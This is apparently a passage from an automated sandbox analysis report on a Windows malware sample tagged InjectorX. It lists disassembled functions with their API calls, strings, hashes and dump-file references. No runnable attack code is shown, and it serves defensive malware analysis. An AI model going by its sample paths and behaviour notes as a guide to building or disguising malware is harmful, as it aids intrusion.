                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                            • DeleteObject.GDI32(00000000), ref: 00404D22
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                            • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                            • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                            • GlobalFree.KERNEL32(?), ref: 0040505C
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                            • ShowWindow.USER32(?,00000000), ref: 004051FB
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                            • ShowWindow.USER32(00000000), ref: 0040520D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                            • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                            • Opcode Fuzzy Hash: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                            • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                            Function 004046B0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 004046FF
                                            • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                            • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                            • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                            • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404817
                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404823
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835
                                              • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                                              • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                              • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                              • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                              • Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                            • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                              • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                              • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                              • Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: : Completed$A$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$6B
                                            • API String ID: 2624150263-1256906607
                                            • Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                            • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
                                            • Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                            • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                            Function 0040437E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                            • GetSysColor.USER32(?), ref: 0040445E
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                            • lstrlenW.KERNEL32(?), ref: 0040447F
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                            • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                            • SendMessageW.USER32(00000000), ref: 00404501
                                            • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                            • SetCursor.USER32(00000000), ref: 00404580
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                            • SetCursor.USER32(00000000), ref: 0040459C
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: : Completed$N
                                            • API String ID: 3103080414-2140067464
                                            • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                            • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                            • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                            • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                            Download Yara Rule
                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                            • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                            • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                            • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                            Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                            • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC
                                              • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                              • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                            • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
                                            • wsprintfA.USER32 ref: 00405F17
                                            • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                            • GlobalFree.KERNEL32(00000000), ref: 00406000
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                              • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                              • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %ls=%ls$[Rename]
                                            • API String ID: 2171350718-461813615
                                            • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                            • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                            • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                            • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                            Function 004064E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004064E1, 004064E6
                                            • *?|<>/":, xrefs: 00406532
                                            • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe", xrefs: 004064E0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-1872199291
                                            • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                            • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                            • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                            • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                            Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                            • GetSysColor.USER32(00000000), ref: 00404281
                                            • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                            • SetBkMode.GDI32(?,?), ref: 00404299
                                            • GetSysColor.USER32(?), ref: 004042AC
                                            • SetBkColor.GDI32(?,?), ref: 004042BC
                                            • DeleteObject.GDI32(?), ref: 004042D6
                                            • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                            • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                            • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                            • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                            Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                              • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                            • String ID: 9
                                            • API String ID: 163830602-2366072709
                                            • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                            • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                            • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                            • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                            Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                            • GetMessagePos.USER32 ref: 00404B9D
